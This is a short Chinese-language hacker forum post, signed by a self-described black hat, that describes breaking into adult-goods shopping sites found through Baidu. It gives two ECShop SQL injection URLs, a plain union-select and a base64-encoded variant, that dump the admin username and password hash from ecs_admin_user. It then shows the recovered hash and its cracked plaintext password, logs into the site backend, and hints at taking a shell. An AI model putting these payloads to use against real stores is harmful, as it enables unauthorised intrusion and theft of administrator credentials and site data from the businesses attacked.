刚看了etcat的入侵成人用品网站 在下也来了兴趣！百度随便找了几个！

首先用以前公布的普通暴库代码试下！

普通代码:"user.php?act=order_query&order_sn=' union select 1，2，3，4，5，6，concat(user_name，0x7c，password，0x7c，email)，8 from ecs_admin_user/*"

 失败 不用怕我们用变形代码！

变种代码:"search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIE

JZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcp

IHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319"

OK 成功！

这一段代码大家看到了吧！

('admin:776202b5b45f80c5a821eeee5c6ff638"')

MD5解密一下！

密码：sexaaa198 成功！

登陆后台看看！

OK！拿SHELL都会吧！

不用多说了吧！。。。。

作者：黑帽 -小虫